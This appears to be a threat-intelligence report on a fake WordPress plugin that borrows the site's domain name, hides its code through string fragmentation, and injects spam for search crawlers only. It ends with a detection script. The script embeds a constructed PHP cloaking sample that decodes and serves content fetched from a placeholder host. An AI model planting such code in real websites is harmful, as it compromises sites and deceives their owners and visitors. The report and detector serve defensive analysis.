
Fake Spam Plugin Uses Victim's Domain Name to Evade Detection

Published 06/07/2025 13:13 · Modified 13/07/2025 09:32


Essential information

Tags
2025-07-06, code injection, evasion techniques, obfuscation, plugin disguise, remote-control, search engine manipulation, seo spam, stealth malware, wordpress
Related entities
1 observable, 13 techniques (MITRE ATT&CK)

Description

A sophisticated infection was discovered that uses a carefully crafted plugin named after the infected domain to avoid detection. The malware injects spam content into websites to manipulate search engine rankings, and it activates only under specific conditions, such as when a search engine crawler is detected. The plugin's code is heavily obfuscated, using thousands of variable assignments that split strings into small fragments. Once decoded, the malware downloads files from external hosts, fetches remote content, and serves custom spam to search engines while the site appears normal to regular visitors. The attacker's domain, mag1cw0rld[.]com, is used for remote control. Because the spam is shown only to crawlers and the plugin blends in with the site's own name, the infection can persist undetected for long periods and is hard to identify with traditional tools.
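The three traits described above (a plugin slug that mimics the site's own domain, string-fragment obfuscation, and crawler-only activation) can be turned into a simple triage heuristic for reviewing a WordPress plugin directory. The script below is an added example, not code from the report or from any vendor tool; the plugin source, slug and site URL are constructed samples, and the thresholds and regexes are assumptions a reviewer would tune.

```python
import re
from urllib.parse import urlparse

# Constructed sample of a suspicious plugin file (not taken from the report):
# short string fragments reassembled into a function name, a crawler
# user-agent check, and a remote fetch of injected content.
SAMPLE_PLUGIN = r"""<?php
/* Plugin Name: example-site */
$a1='ba';$a2='se';$a3='64_';$a4='dec';$a5='ode';
$f=$a1.$a2.$a3.$a4.$a5;
if(preg_match('/googlebot|bingbot/i',$_SERVER['HTTP_USER_AGENT'])){
  echo $f(file_get_contents('http://example.invalid/x'));
}
"""

# Heuristics (assumed thresholds, tune for your environment):
FRAGMENT_RE = re.compile(r"\$\w+\s*=\s*'[^']{1,4}';")          # tiny string pieces
UA_GATE_RE = re.compile(r"HTTP_USER_AGENT|googlebot|bingbot", re.I)
REMOTE_RE = re.compile(
    r"file_get_contents\s*\(\s*['\"]https?://|curl_init|wp_remote_get", re.I)
FRAGMENT_THRESHOLD = 5

def plugin_matches_site(plugin_slug: str, site_url: str) -> bool:
    """True if the plugin slug contains the site's registrable label."""
    host = urlparse(site_url).hostname or ""
    label = host.removeprefix("www.").split(".")[0].lower()
    return bool(label) and label in plugin_slug.lower()

def score_source(src: str) -> list[str]:
    """Return human-readable findings for one plugin source file."""
    findings = []
    fragments = len(FRAGMENT_RE.findall(src))
    if fragments >= FRAGMENT_THRESHOLD:
        findings.append(f"fragmented string assignments: {fragments}")
    if UA_GATE_RE.search(src):
        findings.append("crawler user-agent gating")
    if REMOTE_RE.search(src):
        findings.append("remote content fetch")
    return findings

def assess(plugin_slug: str, site_url: str, src: str) -> list[str]:
    """Combine the name-mimicry check with the source heuristics."""
    findings = score_source(src)
    if plugin_matches_site(plugin_slug, site_url):
        findings.insert(0, "plugin slug mimics site domain")
    return findings

if __name__ == "__main__":
    for f in assess("example-site", "https://www.example-site.test", SAMPLE_PLUGIN):
        print("-", f)
```

Any plugin that hits more than one of these findings deserves a manual read of its decoded source and a comparison of the page served to a crawler user agent against the page served to a normal browser.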

External references